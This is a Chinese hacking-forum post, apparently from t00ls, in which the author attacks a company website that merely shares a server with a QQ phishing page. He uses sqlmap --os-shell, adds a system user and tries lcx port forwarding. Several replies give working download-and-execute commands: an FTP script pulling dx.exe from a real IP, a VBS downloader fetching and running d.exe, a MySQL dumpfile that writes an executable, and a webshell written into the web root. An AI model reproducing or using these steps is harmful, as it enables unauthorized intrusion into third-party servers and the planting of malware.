菜鸟渗透某钓鱼网站
某日无聊,邮箱突然来了提示,打开如图
点击蓝色文字,跳转到一个页面,是一个仿腾讯的登录页面,要求你输入QQ号和密码,呵呵,也就是个钓鱼网站
反正也闲的没事,看看能不能拿下,防止更多人受骗
主站扫了下,没什么注入和上传,到是把后台给找到了。
尝试弱口令登录,admin,admin888什么的无果
想社工看看能不能查到什么资料,去whois了下网站,发现了这个
在土司扯蛋群里寻求帮助,在此感谢@0xcodede
在我满怀希望的心情下登录后台。。妈的登录失败
好吧,看看旁注可以拿下不(必应接口封了,t00ls旁注和御剑都不能用了,只能一个一个手工,求大牛推荐款工具)
旁站发现了个这个目标站,看着像Destoon
结果乌云是真爱。。
但是真的就这么简单吗?
尼玛这没审核什么东西都干不了。。
联系下客服让帮忙审核
无语了,看了下网站,得花钱才能发布信息,感觉乌云的exp没用。。蛋疼
继续看旁站,发现了一个公司站,一般这种站点洞子多,好拿
找到了个注入点,丢sqlmap里跑下 (论坛有篇相关文章:https://www.t00ls.com/thread-28384-1-1.html)
先判断是不是有权限
语句sqlmap.py -u "www.xxoo.com" --is-dba
那我直接--os-shell
语句:sqlmap.py -u -"www.xxoo.com" --os-shell
能直接用cmd了,直接加用户吧
原来是内网。。传个lcx上去内网转发
尼玛又悲剧了,没免杀的,论坛哪个牛牛有免杀的LCX麻烦传我一份哈哈
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
楼主终于成了大学狗了,吐司一直是楼主向往的圣地,希望管理能给我机会来吐司交流学习,另外文章没什么亮点,就是耐心和运气,求轻喷
关于作者
评论57次
16楼 这方法屡试不爽,很多可以用到
刚学sqlmap的路过 为什么我--os-shell 都是让我写路径 并没有cmd啊
你需要先写了路径才能得到shell
问个问题。。sqlmap下怎么传lcx?。。写vbs?
select unhex("0xFFFFFFFFFFFFFFFFFFFFFF") into dumpfile 'c:\\lcx.exe';
mysql(system)>root sqlmap os-shell 自动 导出插件 注册插件 获取命令行 安全性简直弱到眼前一亮 从图片用户名来看加用户应该不是问题 还有几个网站的用户名应该是降权的说明webshell权限不高 而lz直接就从sqlinj点到提权获取权限的过程 一步到位了
楼主服务器提了吗?我这好想有个面杀lcx
用web程序转发吧,稳定性还可以,另外,渗透过程最好不要加管理员什么的,直接反弹shell什么的慢慢提
ROOT权限现在太少了,现在做钓鱼站的都是放国外VPS机房上,很难提权的
lz思路很不错,钓鱼站被干掉也活该
哈哈哈,不错的样子
灌水扣1分 感谢参与
mysql注入点root权限,却能够os-shell执行命令是几个意思。。。。
刚学sqlmap的路过 为什么我--os-shell 都是让我写路径 并没有cmd啊
@Cyrils 这应该是你要的答案 echo open 119.139.227.19>>ftp echo 123>>ftp echo 123>>ftp echo get dx.exe>>ftp echo bye>>ftp 然后 ftp -s:ftp —————————— echo Set P=createObject("Microsoft.XMLHTTP")>k.vbs echo P.Open "GET","http://xx/d.exe",0 >>k.vbs echo P.Send():set G=createObject("ADODB.Stream")>>k.vbs echo G.Mode=3:G.Type=1:G.Open() >>k.vbs echo G.Write P.ResponseBody:G.SaveToFile "t.exe",2 >>k.vbs k.vbs t.exe
问个问题。。sqlmap下怎么传lcx?。。写vbs?
得爆出网站的绝对路径,然后sqlmap交互shell 在cmd命令下:echo 一句话>网站路径/1.php 就OK啦,详情请看我帖子里面有个连接,是个前辈实战拿的
问个问题。。sqlmap下怎么传lcx?。。写vbs?
一个钓鱼网站陷害了一台服务器啊!